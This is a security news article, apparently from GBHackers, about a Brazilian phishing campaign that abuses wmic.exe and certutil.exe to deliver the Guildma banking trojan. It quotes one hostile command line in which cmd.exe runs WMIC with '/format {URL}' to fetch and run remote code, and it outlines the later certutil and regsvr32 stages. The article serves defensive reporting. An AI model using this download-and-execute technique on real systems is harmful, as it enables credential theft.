Tuesday, March 19, 2024

New Malware Abusing Two Legitimate Windows Files to Steal Victims Personal Data

Researchers discovered a new malware that abusing two legitimate windows files and use it against compromised victims to steal sensitive information.

One file wmic.exe is a command line utility and the other file certutil.exe is a program that manages certificates for Windows.

These files are used for download the payload on the infected windows machine and also other files that later used for malicious purpose.

Attackers using more evasion techniques in this campaign and both files are already used by other malware but current attack integrate both files.

Researchers believe that the cybercriminals behind the malware attack using powerful tools and techniques to perform more stealthy operations.

How Does this Malware Abusing Legitimate Windows files

The initial stage of infection starts from the malicious email campaign that targeting users along with urgency notification content of postal service of Brazil to trick users to click the links inside of the email that posed as users missed the postal delivery attempt.

Attacker trick user to click the embedded link by saying that they can find the more details by clicking the link.

Once the victims click the link and the new windows pop-up that attempts to download a malicious Zip file.

According to Trend Micro report,Once the zip file is downloaded and extracted, the user will be presented with an LNK file (detected as Trojan.LNK.DLOADR.AUSUJM). The LNK file will then point to cmd.exe using the following parameter:
/k start /MIN %WINDIR$\\system32\\wbem\\WMIC.exe os get /format {URL} && exit
The cmd.exe is responsible for executing wmic.exe via the following parameter:
os get /format {URL}

After the execution of cmd.exe attempt to download and execute the command from its command & control server.

It drops the copy of the Windows Files certutil.exe in the %temp% folder in a different name and the next process involved to make an attempt to communicate with the new C&C server to download a new set of files.

Here comes the main payload which detected as TSPY_GUILDMA.C by Trend Micro and the researchers believes that the payload shows that it is a banking malware that only works when the target’s language is set to Portuguese.

Finally, the Payload will be executed on victims machine using regsvr32.exe to steal banking information such as transaction details and login credentials.

Also Read:

New Adwind RAT Attack Linux, Windows and Mac via DDE Code Injection Technique by Evading Antivirus Software

Java Usage Tracker Critical Flaw Enable Hackers to Inject Arbitrary Files on Windows Systems

Website

Latest articles

Beware Of Free wedding Invite WhatsApp Scam That Steal Sensitive Data

The ongoing "free wedding invite" scam is one of several innovative campaigns aimed at...

Hackers Using Weaponized SVG Files in Cyber Attacks

Cybercriminals have repurposed Scalable Vector Graphics (SVG) files to deliver malware, a technique that...

New Acoustic Keyboard Side Channel Attack Let Attackers Steal Sensitive Data

In recent years, personal data security has surged in importance due to digital device...

Discontinued WordPress Plugin Flaw Exposes Websites to Cyber Attacks

A critical vulnerability was discovered in two plugins developed by miniOrange.The affected plugins,...

ShadowSyndicate Hackers Exploiting Aiohttp Vulnerability To Access Sensitive Data

A new Aiohttp vulnerability has been discovered, which the threat actor ShadowSyndicate exploits.Aiohttp...

Hackers Launching AI-Powered Cyber Attacks to Steal Billions

INTERPOL's latest assessment on global financial fraud uncovers the sophisticated evolution of cybercrime, fueled...

Fujitsu Hacked – Attackers Infected The Company Computers with Malware

Fujitsu Limited announced the discovery of malware on several of its operational computers, raising...
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles